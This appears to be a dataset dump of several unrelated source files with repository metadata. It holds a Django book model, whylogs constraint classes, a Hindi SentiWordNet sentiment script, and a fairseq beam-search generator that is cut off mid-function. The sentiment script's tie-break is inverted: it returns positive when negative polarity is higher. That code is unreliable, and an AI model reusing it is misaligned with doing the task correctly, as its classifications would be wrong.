] | 5 | 2021-03-19T12:18:04.000Z | 2021-09-22T19:43:58.000Z | books_api/core/models.py | kennyaires/olist-challenge | ec0194c9b48d4ec8693d3d39498f63f42dfaf251 | [
"MIT"
] | null | null | null | from django.db import models
class Author(models.Model):
name = models.CharField(max_length=255, unique=True)
def __str__(self):
return self.name
class Book(models.Model):
name = models.CharField(max_length=255)
edition = models.CharField(max_length=255, null=True)
publication_year = models.PositiveSmallIntegerField(blank=True, null=True)
authors = models.ManyToManyField(Author)
def __str__(self):
return self.name
| 24.631579 | 78 | 0.720085 |
a467c22a3332ab7726d2d639c1f2cc140293cac0 | 13,377 | py | Python | src/whylogs/core/statistics/constraints.py | whylabs/whylogs-python | 937c43ea87946ec294e6d7ec9f3c35cfa0b7a22b | [
"Apache-2.0"
] | 327 | 2020-08-18T17:09:44.000Z | 2021-02-25T11:03:57.000Z | src/whylogs/core/statistics/constraints.py | whylabs/whylogs-core | 80cce9d652553adc674d647e00ea8f414b75a95a | [
"Apache-2.0"
] | 66 | 2020-08-25T15:18:16.000Z | 2021-02-22T21:25:35.000Z | src/whylogs/core/statistics/constraints.py | whylabs/whylogs-python | 937c43ea87946ec294e6d7ec9f3c35cfa0b7a22b | [
"Apache-2.0"
] | 13 | 2020-09-08T22:44:10.000Z | 2021-01-28T00:32:58.000Z | import logging
import re
from typing import List, Mapping, Optional
from google.protobuf.json_format import Parse
from whylogs.proto import (
DatasetConstraintMsg,
DatasetProperties,
NumberSummary,
Op,
SummaryConstraintMsg,
SummaryConstraintMsgs,
ValueConstraintMsg,
ValueConstraintMsgs,
)
from whylogs.util.protobuf import message_to_json
logger = logging.getLogger(__name__)
"""
Dict indexed by constraint operator.
These help translate from constraint schema to language-specific functions that are faster to evaluate.
This is just a form of currying, and I chose to bind the boolean comparison operator first.
"""
_value_funcs = {
# functions that compare an incoming feature value to a literal value.
Op.LT: lambda x: lambda v: v < x, # assert incoming value 'v' is less than some fixed value 'x'
Op.LE: lambda x: lambda v: v <= x,
Op.EQ: lambda x: lambda v: v == x,
Op.NE: lambda x: lambda v: v != x,
Op.GE: lambda x: lambda v: v >= x,
Op.GT: lambda x: lambda v: v > x, # assert incoming value 'v' is greater than some fixed value 'x'
Op.MATCH: lambda x: lambda v: x.match(v) is not None,
Op.NOMATCH: lambda x: lambda v: x.match(v) is None,
}
_summary_funcs1 = {
# functions that compare a summary field to a literal value.
Op.LT: lambda f, v: lambda s: getattr(s, f) < v,
Op.LE: lambda f, v: lambda s: getattr(s, f) <= v,
Op.EQ: lambda f, v: lambda s: getattr(s, f) == v,
Op.NE: lambda f, v: lambda s: getattr(s, f) != v,
Op.GE: lambda f, v: lambda s: getattr(s, f) >= v,
Op.GT: lambda f, v: lambda s: getattr(s, f) > v,
}
_summary_funcs2 = {
# functions that compare two summary fields.
Op.LT: lambda f, f2: lambda s: getattr(s, f) < getattr(s, f2),
Op.LE: lambda f, f2: lambda s: getattr(s, f) <= getattr(s, f2),
Op.EQ: lambda f, f2: lambda s: getattr(s, f) == getattr(s, f2),
Op.NE: lambda f, f2: lambda s: getattr(s, f) != getattr(s, f2),
Op.GE: lambda f, f2: lambda s: getattr(s, f) >= getattr(s, f2),
Op.GT: lambda f, f2: lambda s: getattr(s, f) > getattr(s, f2),
}
class ValueConstraint:
"""
ValueConstraints express a binary boolean relationship between an implied numeric value and a literal.
When associated with a ColumnProfile, the relation is evaluated for every incoming value that is processed by whylogs.
Parameters
----------
op : whylogs.proto.Op (required)
Enumeration of binary comparison operator applied between static value and incoming stream.
Enum values are mapped to operators like '==', '<', and '<=', etc.
value : (required)
Static value to compare against incoming stream using operator specified in `op`.
name : str
Name of the constraint used for reporting
verbose : bool
If true, log every application of this constraint that fails.
Useful to identify specific streaming values that fail the constraint.
"""
def __init__(self, op: Op, value=None, regex_pattern: str = None, name: str = None, verbose=False):
self._name = name
self._verbose = verbose
self.op = op
self.total = 0
self.failures = 0
if value is not None and regex_pattern is None:
# numeric value
self.value = value
self.func = _value_funcs[op](value)
elif regex_pattern is not None and value is None:
# Regex pattern
self.regex_pattern = regex_pattern
self.func = _value_funcs[op](re.compile(self.regex_pattern))
else:
raise ValueError("Value constraint must specify a numeric value or regex pattern, but not both")
@property
def name(self):
if getattr(self, "value", None):
return self._name if self._name is not None else f"value {Op.Name(self.op)} {self.value}"
else:
return self._name if self._name is not None else f"value {Op.Name(self.op)} {self.regex_pattern}"
def update(self, v) -> bool:
self.total += 1
if self.op in [Op.MATCH, Op.NOMATCH] and not isinstance(v, str):
self.failures += 1
if self._verbose:
logger.info(f"value constraint {self.name} failed: value {v} not a string")
elif not self.func(v):
self.failures += 1
if self._verbose:
logger.info(f"value constraint {self.name} failed on value {v}")
@staticmethod
def from_protobuf(msg: ValueConstraintMsg) -> "ValueConstraint":
return ValueConstraint(msg.op, msg.value, name=msg.name, verbose=msg.verbose)
def to_protobuf(self) -> ValueConstraintMsg:
if hasattr(self, "value"):
return ValueConstraintMsg(
name=self.name,
op=self.op,
value=self.value,
verbose=self._verbose,
)
else:
return ValueConstraintMsg(
name=self.name,
op=self.op,
regex_pattern=self.regex_pattern,
verbose=self._verbose,
)
def report(self):
return (self.name, self.total, self.failures)
class SummaryConstraint:
"""
Summary constraints specify a relationship between a summary field and a static value,
or between two summary fields.
e.g. 'min' < 6
'std_dev' < 2.17
'min' > 'avg'
Parameters
----------
first_field : str
Name of field in NumberSummary that will be compared against either a second field or a static value.
op : whylogs.proto.Op (required)
Enumeration of binary comparison operator applied between summary values.
Enum values are mapped to operators like '==', '<', and '<=', etc.
value : (one-of)
Static value to be compared against summary field specified in `first_field`.
Only one of `value` or `second_field` should be supplied.
second_field : (one-of)
Name of second field in NumberSummary to be compared against summary field specified in `first_field`.
Only one of `value` or `second_field` should be supplied.
name : str
Name of the constraint used for reporting
verbose : bool
If true, log every application of this constraint that fails.
Useful to identify specific streaming values that fail the constraint.
"""
def __init__(
self,
first_field: str,
op: Op,
value=None,
second_field: str = None,
name: str = None,
verbose=False,
):
self._verbose = verbose
self._name = name
self.op = op
self.first_field = first_field
self.second_field = second_field
self.total = 0
self.failures = 0
if value is not None and second_field is None:
# field-value summary comparison
self.value = value
self.func = _summary_funcs1[op](first_field, value)
elif second_field is not None and value is None:
# field-field summary comparison
self.second_field = second_field
self.func = _summary_funcs2[op](first_field, second_field)
else:
raise ValueError("Summary constraint must specify a second value or field name, but not both")
@property
def name(self):
return self._name if self._name is not None else f"summary {self.first_field} {Op.Name(self.op)} {self.value}/{self.second_field}"
def update(self, summ: NumberSummary) -> bool:
self.total += 1
if not self.func(summ):
self.failures += 1
if self._verbose:
logger.info(f"summary constraint {self.name} failed")
@staticmethod
def from_protobuf(msg: SummaryConstraintMsg) -> "SummaryConstraint":
if msg.HasField("value") and not msg.HasField("second_field"):
return SummaryConstraint(
msg.first_field,
msg.op,
value=msg.value,
name=msg.name,
verbose=msg.verbose,
)
elif msg.HasField("second_field") and not msg.HasField("value"):
return SummaryConstraint(
msg.first_field,
msg.op,
second_field=msg.second_field,
name=msg.name,
verbose=msg.verbose,
)
else:
raise ValueError("SummaryConstraintMsg must specify a value or second field name, but not both")
def to_protobuf(self) -> SummaryConstraintMsg:
if self.second_field is None:
msg = SummaryConstraintMsg(
name=self.name,
first_field=self.first_field,
op=self.op,
value=self.value,
verbose=self._verbose,
)
else:
msg = SummaryConstraintMsg(
name=self.name,
first_field=self.first_field,
op=self.op,
second_field=self.second_field,
verbose=self._verbose,
)
return msg
def report(self):
return (self.name, self.total, self.failures)
class ValueConstraints:
def __init__(self, constraints: List[ValueConstraint] = []):
self.constraints = constraints
@staticmethod
def from_protobuf(msg: ValueConstraintMsgs) -> "ValueConstraints":
v = [ValueConstraint.from_protobuf(c) for c in msg.constraints]
if len(v) > 0:
return ValueConstraints(v)
return None
def to_protobuf(self) -> ValueConstraintMsgs:
v = [c.to_protobuf() for c in self.constraints]
if len(v) > 0:
vcmsg = ValueConstraintMsgs()
vcmsg.constraints.extend(v)
return vcmsg
return None
def update(self, v):
for c in self.constraints:
c.update(v)
def report(self) -> List[tuple]:
v = [c.report() for c in self.constraints]
if len(v) > 0:
return v
return None
class SummaryConstraints:
def __init__(self, constraints: List[SummaryConstraint]):
self.constraints = constraints
@staticmethod
def from_protobuf(msg: SummaryConstraintMsgs) -> "SummaryConstraints":
v = [SummaryConstraint.from_protobuf(c) for c in msg.constraints]
if len(v) > 0:
return SummaryConstraints(v)
return None
def to_protobuf(self) -> SummaryConstraintMsgs:
v = [c.to_protobuf() for c in self.constraints]
if len(v) > 0:
scmsg = SummaryConstraintMsgs()
scmsg.constraints.extend(v)
return scmsg
return None
def update(self, v):
for c in self.constraints:
c.update(v)
def report(self) -> List[tuple]:
v = [c.report() for c in self.constraints]
if len(v) > 0:
return v
return None
class DatasetConstraints:
def __init__(
self,
props: DatasetProperties,
value_constraints: Optional[Mapping[str, ValueConstraints]] = None,
summary_constraints: Optional[Mapping[str, SummaryConstraints]] = None,
):
self.dataset_properties = props
# repackage lists of constraints if necessary
if value_constraints is None:
value_constraints = dict()
for k, v in value_constraints.items():
if isinstance(v, list):
value_constraints[k] = ValueConstraints(v)
self.value_constraint_map = value_constraints
if summary_constraints is None:
summary_constraints = dict()
for k, v in summary_constraints.items():
if isinstance(v, list):
summary_constraints[k] = SummaryConstraints(v)
self.summary_constraint_map = summary_constraints
def __getitem__(self, key):
if key in self.value_constraint_map:
return self.value_constraint_map[key]
return None
@staticmethod
def from_protobuf(msg: DatasetConstraintMsg) -> "DatasetConstraints":
vm = dict([(k, ValueConstraints.from_protobuf(v)) for k, v in msg.value_constraints.items()])
sm = dict([(k, SummaryConstraints.from_protobuf(v)) for k, v in msg.summary_constraints.items()])
return DatasetConstraints(msg.properties, vm, sm)
@staticmethod
def from_json(data: str) -> "DatasetConstraints":
msg = Parse(data, DatasetConstraintMsg())
return DatasetConstraints.from_protobuf(msg)
def to_protobuf(self) -> DatasetConstraintMsg:
# construct tuple for each column, (name, [constraints,...])
# turn that into a map indexed by column name
vm = dict([(k, v.to_protobuf()) for k, v in self.value_constraint_map.items()])
sm = dict([(k, s.to_protobuf()) for k, s in self.summary_constraint_map.items()])
return DatasetConstraintMsg(
properties=self.dataset_properties,
value_constraints=vm,
summary_constraints=sm,
)
def to_json(self) -> str:
return message_to_json(self.to_protobuf())
def report(self):
l1 = [(k, v.report()) for k, v in self.value_constraint_map.items()]
l2 = [(k, s.report()) for k, s in self.summary_constraint_map.items()]
return l1 + l2
| 36.252033 | 138 | 0.614488 |
d7587a7b5a88339a0cd5d11099e6abfd34795602 | 2,499 | py | Python | ResourceBasedSentimentClassification.py | nishii-singh/Sentiment-analysis | efd75687ccf79e8aac44328c0cb999a9c14000c4 | [
"Apache-2.0"
] | null | null | null | ResourceBasedSentimentClassification.py | nishii-singh/Sentiment-analysis | efd75687ccf79e8aac44328c0cb999a9c14000c4 | [
"Apache-2.0"
] | null | null | null | ResourceBasedSentimentClassification.py | nishii-singh/Sentiment-analysis | efd75687ccf79e8aac44328c0cb999a9c14000c4 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# coding: utf-8
# In[ ]:
# NISHI SINGH
# HOOMACL201900025
# MA COMPUTATIONAL LINGUISTICS
# This module is written to do a Resource Based Semantic analyasis using hindi sentiwordnet.
import pandas as pd
import codecs
from nltk.tokenize import word_tokenize
import sklearn.metrics
import re
fields = ['POS_TAG', 'ID', 'POS', 'NEG', 'LIST_OF_WORDS']
#Creating a dictionary which contain a tuple for every word. Tuple contains a list of synonyms,
# positive score and negative score for that word.
def sentiment(text):
print(text)
words = word_tokenize(text)
votes = []
pos_polarity = 0
neg_polarity = 0
#adverbs, nouns, adjective, verb are only used
allowed_words = ['a','v','r','n']
for word in words:
if word in words_dict:
#if word in dictionary, it picks up the positive and negative score of the word
pos, neg = words_dict[word]
print(word,pos, neg)
if pos > neg:
pos_polarity += pos
votes.append(1)
elif neg > pos:
neg_polarity += neg
votes.append(0)
#calculating the no. of positive and negative words in total in a review to give class labels
pos_votes = votes.count(1)
neg_votes = votes.count(0)
if pos_votes > neg_votes:
return 1
elif neg_votes > pos_votes:
return -1
else:
if pos_polarity < neg_polarity:
return 1
elif neg_polarity>pos_polarity :
return -1
else:
return 0
words_dict = {}
# This function determines sentiment of text.
data = pd.read_csv("HindiSentiWordnet.txt", delimiter=' ')
for i in data.index:
# print (data[fields[0]][i], data[fields[1]][i], data[fields[2]][i], data[fields[3]][i], data[fields[4]][i])
words = data[fields[4]][i].split(',')
for word in words:
words_dict[word] = (data[fields[2]][i], data[fields[3]][i])
#print(word,data[fields[0]][i], data[fields[2]][i], data[fields[3]][i])
# for x in words_dict:
# print(x)
# for y in words_dict[x]:
# print(y)
c='Y'
while c=='Y' or c=='y':
text=input('Enter a Hindi news article: ')
t=sentiment(text)
if t==1:
print("Positive")
elif t==-1 :
print("Negative")
else:
print("Neutral")
c=input('To Continue press Y: ')
#print(len(actual_y))
#print(accuracy_score(actual_y, pred_y) * 100)
#print('F-measure: ',f1_score(actual_y,pred_y))
| 30.108434 | 112 | 0.615046 |
7d323d85e7c9ca9325c77f12c3a95d259459ede7 | 39,780 | py | Python | fairseq/sequence_generator.py | dumpmemory/fairseq | c39fefccb013bfb8b1dc6cbbfabe1fd7ad4344a7 | [
"MIT"
] | 1 | 2021-11-10T06:17:44.000Z | 2021-11-10T06:17:44.000Z | fairseq/sequence_generator.py | EricWangCN/fairseq | 321589988bc05038f927cf5e887e8c60f46d9c2a | [
"MIT"
] | null | null | null | fairseq/sequence_generator.py | EricWangCN/fairseq | 321589988bc05038f927cf5e887e8c60f46d9c2a | [
"MIT"
] | null | null | null | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import math
import sys
from typing import Dict, List, Optional
import torch
import torch.nn as nn
from torch import Tensor
from fairseq import search, utils
from fairseq.data import data_utils
from fairseq.models import FairseqIncrementalDecoder
from fairseq.ngram_repeat_block import NGramRepeatBlock
class SequenceGenerator(nn.Module):
def __init__(
self,
models,
tgt_dict,
beam_size=1,
max_len_a=0,
max_len_b=200,
max_len=0,
min_len=1,
normalize_scores=True,
len_penalty=1.0,
unk_penalty=0.0,
temperature=1.0,
match_source_len=False,
no_repeat_ngram_size=0,
search_strategy=None,
eos=None,
symbols_to_strip_from_output=None,
lm_model=None,
lm_weight=1.0,
):
"""Generates translations of a given source sentence.
Args:
models (List[~fairseq.models.FairseqModel]): ensemble of models,
currently support fairseq.models.TransformerModel for scripting
beam_size (int, optional): beam width (default: 1)
max_len_a/b (int, optional): generate sequences of maximum length
ax + b, where x is the source length
max_len (int, optional): the maximum length of the generated output
(not including end-of-sentence)
min_len (int, optional): the minimum length of the generated output
(not including end-of-sentence)
normalize_scores (bool, optional): normalize scores by the length
of the output (default: True)
len_penalty (float, optional): length penalty, where <1.0 favors
shorter, >1.0 favors longer sentences (default: 1.0)
unk_penalty (float, optional): unknown word penalty, where <0
produces more unks, >0 produces fewer (default: 0.0)
temperature (float, optional): temperature, where values
>1.0 produce more uniform samples and values <1.0 produce
sharper samples (default: 1.0)
match_source_len (bool, optional): outputs should match the source
length (default: False)
"""
super().__init__()
if isinstance(models, EnsembleModel):
self.model = models
else:
self.model = EnsembleModel(models)
self.tgt_dict = tgt_dict
self.pad = tgt_dict.pad()
self.unk = tgt_dict.unk()
self.eos = tgt_dict.eos() if eos is None else eos
self.symbols_to_strip_from_output = (
symbols_to_strip_from_output.union({self.eos})
if symbols_to_strip_from_output is not None
else {self.eos}
)
self.vocab_size = len(tgt_dict)
self.beam_size = beam_size
# the max beam size is the dictionary size - 1, since we never select pad
self.beam_size = min(beam_size, self.vocab_size - 1)
self.model.set_decoder_beam_size(self.beam_size)
self.max_len_a = max_len_a
self.max_len_b = max_len_b
self.min_len = min_len
self.max_len = max_len or self.model.max_decoder_positions()
self.normalize_scores = normalize_scores
self.len_penalty = len_penalty
self.unk_penalty = unk_penalty
self.temperature = temperature
self.match_source_len = match_source_len
if no_repeat_ngram_size > 0:
self.repeat_ngram_blocker = NGramRepeatBlock(no_repeat_ngram_size)
else:
self.repeat_ngram_blocker = None
assert temperature > 0, "--temperature must be greater than 0"
self.search = (
search.BeamSearch(tgt_dict) if search_strategy is None else search_strategy
)
# We only need to set src_lengths in LengthConstrainedBeamSearch.
# As a module attribute, setting it would break in multithread
# settings when the model is shared.
self.should_set_src_lengths = (
hasattr(self.search, "needs_src_lengths") and self.search.needs_src_lengths
)
self.model.eval()
self.lm_model = lm_model
self.lm_weight = lm_weight
if self.lm_model is not None:
self.lm_model.eval()
def cuda(self):
self.model.cuda()
return self
@torch.no_grad()
def forward(
self,
sample: Dict[str, Dict[str, Tensor]],
prefix_tokens: Optional[Tensor] = None,
bos_token: Optional[int] = None,
):
"""Generate a batch of translations.
Args:
sample (dict): batch
prefix_tokens (torch.LongTensor, optional): force decoder to begin
with these tokens
bos_token (int, optional): beginning of sentence token
(default: self.eos)
"""
return self._generate(sample, prefix_tokens, bos_token=bos_token)
# TODO(myleott): unused, deprecate after pytorch-translate migration
def generate_batched_itr(self, data_itr, beam_size=None, cuda=False, timer=None):
"""Iterate over a batched dataset and yield individual translations.
Args:
cuda (bool, optional): use GPU for generation
timer (StopwatchMeter, optional): time generations
"""
for sample in data_itr:
s = utils.move_to_cuda(sample) if cuda else sample
if "net_input" not in s:
continue
input = s["net_input"]
# model.forward normally channels prev_output_tokens into the decoder
# separately, but SequenceGenerator directly calls model.encoder
encoder_input = {
k: v for k, v in input.items() if k != "prev_output_tokens"
}
if timer is not None:
timer.start()
with torch.no_grad():
hypos = self.generate(encoder_input)
if timer is not None:
timer.stop(sum(len(h[0]["tokens"]) for h in hypos))
for i, id in enumerate(s["id"].data):
# remove padding
src = utils.strip_pad(input["src_tokens"].data[i, :], self.pad)
ref = (
utils.strip_pad(s["target"].data[i, :], self.pad)
if s["target"] is not None
else None
)
yield id, src, ref, hypos[i]
@torch.no_grad()
def generate(
self, models, sample: Dict[str, Dict[str, Tensor]], **kwargs
) -> List[List[Dict[str, Tensor]]]:
"""Generate translations. Match the api of other fairseq generators.
Args:
models (List[~fairseq.models.FairseqModel]): ensemble of models
sample (dict): batch
prefix_tokens (torch.LongTensor, optional): force decoder to begin
with these tokens
constraints (torch.LongTensor, optional): force decoder to include
the list of constraints
bos_token (int, optional): beginning of sentence token
(default: self.eos)
"""
return self._generate(sample, **kwargs)
def _generate(
self,
sample: Dict[str, Dict[str, Tensor]],
prefix_tokens: Optional[Tensor] = None,
constraints: Optional[Tensor] = None,
bos_token: Optional[int] = None,
):
incremental_states = torch.jit.annotate(
List[Dict[str, Dict[str, Optional[Tensor]]]],
[
torch.jit.annotate(Dict[str, Dict[str, Optional[Tensor]]], {})
for i in range(self.model.models_size)
],
)
net_input = sample["net_input"]
if "src_tokens" in net_input:
src_tokens = net_input["src_tokens"]
# length of the source text being the character length except EndOfSentence and pad
src_lengths = (
(src_tokens.ne(self.eos) & src_tokens.ne(self.pad)).long().sum(dim=1)
)
elif "source" in net_input:
src_tokens = net_input["source"]
src_lengths = (
net_input["padding_mask"].size(-1) - net_input["padding_mask"].sum(-1)
if net_input["padding_mask"] is not None
else torch.tensor(src_tokens.size(-1)).to(src_tokens)
)
elif "features" in net_input:
src_tokens = net_input["features"]
src_lengths = (
net_input["padding_mask"].size(-1) - net_input["padding_mask"].sum(-1)
if net_input["padding_mask"] is not None
else torch.tensor(src_tokens.size(-1)).to(src_tokens)
)
else:
raise Exception(
"expected src_tokens or source in net input. input keys: "
+ str(net_input.keys())
)
# bsz: total number of sentences in beam
# Note that src_tokens may have more than 2 dimensions (i.e. audio features)
bsz, src_len = src_tokens.size()[:2]
beam_size = self.beam_size
if constraints is not None and not self.search.supports_constraints:
raise NotImplementedError(
"Target-side constraints were provided, but search method doesn't support them"
)
# Initialize constraints, when active
self.search.init_constraints(constraints, beam_size)
max_len: int = -1
if self.match_source_len:
max_len = src_lengths.max().item()
else:
max_len = min(
int(self.max_len_a * src_len + self.max_len_b),
self.max_len - 1,
)
assert (
self.min_len <= max_len
), "min_len cannot be larger than max_len, please adjust these!"
# compute the encoder output for each beam
with torch.autograd.profiler.record_function("EnsembleModel: forward_encoder"):
encoder_outs = self.model.forward_encoder(net_input)
# placeholder of indices for bsz * beam_size to hold tokens and accumulative scores
new_order = torch.arange(bsz).view(-1, 1).repeat(1, beam_size).view(-1)
new_order = new_order.to(src_tokens.device).long()
encoder_outs = self.model.reorder_encoder_out(encoder_outs, new_order)
# ensure encoder_outs is a List.
assert encoder_outs is not None
# initialize buffers
scores = (
torch.zeros(bsz * beam_size, max_len + 1).to(src_tokens).float()
) # +1 for eos; pad is never chosen for scoring
tokens = (
torch.zeros(bsz * beam_size, max_len + 2)
.to(src_tokens)
.long()
.fill_(self.pad)
) # +2 for eos and pad
tokens[:, 0] = self.eos if bos_token is None else bos_token
attn: Optional[Tensor] = None
# A list that indicates candidates that should be ignored.
# For example, suppose we're sampling and have already finalized 2/5
# samples. Then cands_to_ignore would mark 2 positions as being ignored,
# so that we only finalize the remaining 3 samples.
cands_to_ignore = (
torch.zeros(bsz, beam_size).to(src_tokens).eq(-1)
) # forward and backward-compatible False mask
# list of completed sentences
finalized = torch.jit.annotate(
List[List[Dict[str, Tensor]]],
[torch.jit.annotate(List[Dict[str, Tensor]], []) for i in range(bsz)],
) # contains lists of dictionaries of infomation about the hypothesis being finalized at each step
# a boolean array indicating if the sentence at the index is finished or not
finished = [False for i in range(bsz)]
num_remaining_sent = bsz # number of sentences remaining
# number of candidate hypos per step
cand_size = 2 * beam_size # 2 x beam size in case half are EOS
# offset arrays for converting between different indexing schemes
bbsz_offsets = (
(torch.arange(0, bsz) * beam_size)
.unsqueeze(1)
.type_as(tokens)
.to(src_tokens.device)
)
cand_offsets = torch.arange(0, cand_size).type_as(tokens).to(src_tokens.device)
reorder_state: Optional[Tensor] = None
batch_idxs: Optional[Tensor] = None
original_batch_idxs: Optional[Tensor] = None
if "id" in sample and isinstance(sample["id"], Tensor):
original_batch_idxs = sample["id"]
else:
original_batch_idxs = torch.arange(0, bsz).type_as(tokens)
for step in range(max_len + 1): # one extra step for EOS marker
# reorder decoder internal states based on the prev choice of beams
if reorder_state is not None:
if batch_idxs is not None:
# update beam indices to take into account removed sentences
corr = batch_idxs - torch.arange(batch_idxs.numel()).type_as(
batch_idxs
)
reorder_state.view(-1, beam_size).add_(
corr.unsqueeze(-1) * beam_size
)
original_batch_idxs = original_batch_idxs[batch_idxs]
self.model.reorder_incremental_state(incremental_states, reorder_state)
encoder_outs = self.model.reorder_encoder_out(
encoder_outs, reorder_state
)
with torch.autograd.profiler.record_function(
"EnsembleModel: forward_decoder"
):
lprobs, avg_attn_scores = self.model.forward_decoder(
tokens[:, : step + 1],
encoder_outs,
incremental_states,
self.temperature,
)
if self.lm_model is not None:
lm_out = self.lm_model(tokens[:, : step + 1])
probs = self.lm_model.get_normalized_probs(
lm_out, log_probs=True, sample=None
)
probs = probs[:, -1, :] * self.lm_weight
lprobs += probs
lprobs[lprobs != lprobs] = torch.tensor(-math.inf).to(lprobs)
lprobs[:, self.pad] = -math.inf # never select pad
lprobs[:, self.unk] -= self.unk_penalty # apply unk penalty
# handle max length constraint
if step >= max_len:
lprobs[:, : self.eos] = -math.inf
lprobs[:, self.eos + 1 :] = -math.inf
# handle prefix tokens (possibly with different lengths)
if (
prefix_tokens is not None
and step < prefix_tokens.size(1)
and step < max_len
):
lprobs, tokens, scores = self._prefix_tokens(
step, lprobs, scores, tokens, prefix_tokens, beam_size
)
elif step < self.min_len:
# minimum length constraint (does not apply if using prefix_tokens)
lprobs[:, self.eos] = -math.inf
# Record attention scores, only support avg_attn_scores is a Tensor
if avg_attn_scores is not None:
if attn is None:
attn = torch.empty(
bsz * beam_size, avg_attn_scores.size(1), max_len + 2
).to(scores)
attn[:, :, step + 1].copy_(avg_attn_scores)
scores = scores.type_as(lprobs)
eos_bbsz_idx = torch.empty(0).to(
tokens
) # indices of hypothesis ending with eos (finished sentences)
eos_scores = torch.empty(0).to(
scores
) # scores of hypothesis ending with eos (finished sentences)
if self.should_set_src_lengths:
self.search.set_src_lengths(src_lengths)
if self.repeat_ngram_blocker is not None:
lprobs = self.repeat_ngram_blocker(tokens, lprobs, bsz, beam_size, step)
# Shape: (batch, cand_size)
cand_scores, cand_indices, cand_beams = self.search.step(
step,
lprobs.view(bsz, -1, self.vocab_size),
scores.view(bsz, beam_size, -1)[:, :, :step],
tokens[:, : step + 1],
original_batch_idxs,
)
# cand_bbsz_idx contains beam indices for the top candidate
# hypotheses, with a range of values: [0, bsz*beam_size),
# and dimensions: [bsz, cand_size]
cand_bbsz_idx = cand_beams.add(bbsz_offsets)
# finalize hypotheses that end in eos
# Shape of eos_mask: (batch size, beam size)
eos_mask = cand_indices.eq(self.eos) & cand_scores.ne(-math.inf)
eos_mask[:, :beam_size][cands_to_ignore] = torch.tensor(0).to(eos_mask)
# only consider eos when it's among the top beam_size indices
# Now we know what beam item(s) to finish
# Shape: 1d list of absolute-numbered
eos_bbsz_idx = torch.masked_select(
cand_bbsz_idx[:, :beam_size], mask=eos_mask[:, :beam_size]
)
finalized_sents: List[int] = []
if eos_bbsz_idx.numel() > 0:
eos_scores = torch.masked_select(
cand_scores[:, :beam_size], mask=eos_mask[:, :beam_size]
)
finalized_sents = self.finalize_hypos(
step,
eos_bbsz_idx,
eos_scores,
tokens,
scores,
finalized,
finished,
beam_size,
attn,
src_lengths,
max_len,
)
num_remaining_sent -= len(finalized_sents)
assert num_remaining_sent >= 0
if num_remaining_sent == 0:
break
if self.search.stop_on_max_len and step >= max_len:
break
assert step < max_len, f"{step} < {max_len}"
# Remove finalized sentences (ones for which {beam_size}
# finished hypotheses have been generated) from the batch.
if len(finalized_sents) > 0:
new_bsz = bsz - len(finalized_sents)
# construct batch_idxs which holds indices of batches to keep for the next pass
batch_mask = torch.ones(
bsz, dtype=torch.bool, device=cand_indices.device
)
batch_mask[finalized_sents] = False
# TODO replace `nonzero(as_tuple=False)` after TorchScript supports it
batch_idxs = torch.arange(
bsz, device=cand_indices.device
).masked_select(batch_mask)
# Choose the subset of the hypothesized constraints that will continue
self.search.prune_sentences(batch_idxs)
eos_mask = eos_mask[batch_idxs]
cand_beams = cand_beams[batch_idxs]
bbsz_offsets.resize_(new_bsz, 1)
cand_bbsz_idx = cand_beams.add(bbsz_offsets)
cand_scores = cand_scores[batch_idxs]
cand_indices = cand_indices[batch_idxs]
if prefix_tokens is not None:
prefix_tokens = prefix_tokens[batch_idxs]
src_lengths = src_lengths[batch_idxs]
cands_to_ignore = cands_to_ignore[batch_idxs]
scores = scores.view(bsz, -1)[batch_idxs].view(new_bsz * beam_size, -1)
tokens = tokens.view(bsz, -1)[batch_idxs].view(new_bsz * beam_size, -1)
if attn is not None:
attn = attn.view(bsz, -1)[batch_idxs].view(
new_bsz * beam_size, attn.size(1), -1
)
bsz = new_bsz
else:
batch_idxs = None
# Set active_mask so that values > cand_size indicate eos hypos
# and values < cand_size indicate candidate active hypos.
# After, the min values per row are the top candidate active hypos
# Rewrite the operator since the element wise or is not supported in torchscript.
eos_mask[:, :beam_size] = ~((~cands_to_ignore) & (~eos_mask[:, :beam_size]))
active_mask = torch.add(
eos_mask.type_as(cand_offsets) * cand_size,
cand_offsets[: eos_mask.size(1)],
)
# get the top beam_size active hypotheses, which are just
# the hypos with the smallest values in active_mask.
# {active_hypos} indicates which {beam_size} hypotheses
# from the list of {2 * beam_size} candidates were
# selected. Shapes: (batch size, beam size)
new_cands_to_ignore, active_hypos = torch.topk(
active_mask, k=beam_size, dim=1, largest=False
)
# update cands_to_ignore to ignore any finalized hypos.
cands_to_ignore = new_cands_to_ignore.ge(cand_size)[:, :beam_size]
# Make sure there is at least one active item for each sentence in the batch.
assert (~cands_to_ignore).any(dim=1).all()
# update cands_to_ignore to ignore any finalized hypos
# {active_bbsz_idx} denotes which beam number is continued for each new hypothesis (a beam
# can be selected more than once).
active_bbsz_idx = torch.gather(cand_bbsz_idx, dim=1, index=active_hypos)
active_scores = torch.gather(cand_scores, dim=1, index=active_hypos)
active_bbsz_idx = active_bbsz_idx.view(-1)
active_scores = active_scores.view(-1)
# copy tokens and scores for active hypotheses
# Set the tokens for each beam (can select the same row more than once)
tokens[:, : step + 1] = torch.index_select(
tokens[:, : step + 1], dim=0, index=active_bbsz_idx
)
# Select the next token for each of them
tokens.view(bsz, beam_size, -1)[:, :, step + 1] = torch.gather(
cand_indices, dim=1, index=active_hypos
)
if step > 0:
scores[:, :step] = torch.index_select(
scores[:, :step], dim=0, index=active_bbsz_idx
)
scores.view(bsz, beam_size, -1)[:, :, step] = torch.gather(
cand_scores, dim=1, index=active_hypos
)
# Update constraints based on which candidates were selected for the next beam
self.search.update_constraints(active_hypos)
# copy attention for active hypotheses
if attn is not None:
attn[:, :, : step + 2] = torch.index_select(
attn[:, :, : step + 2], dim=0, index=active_bbsz_idx
)
# reorder incremental state in decoder
reorder_state = active_bbsz_idx
# sort by score descending
for sent in range(len(finalized)):
scores = torch.tensor(
[float(elem["score"].item()) for elem in finalized[sent]]
)
_, sorted_scores_indices = torch.sort(scores, descending=True)
finalized[sent] = [finalized[sent][ssi] for ssi in sorted_scores_indices]
finalized[sent] = torch.jit.annotate(
List[Dict[str, Tensor]], finalized[sent]
)
return finalized
def _prefix_tokens(
self, step: int, lprobs, scores, tokens, prefix_tokens, beam_size: int
):
"""Handle prefix tokens"""
prefix_toks = prefix_tokens[:, step].unsqueeze(-1).repeat(1, beam_size).view(-1)
prefix_lprobs = lprobs.gather(-1, prefix_toks.unsqueeze(-1))
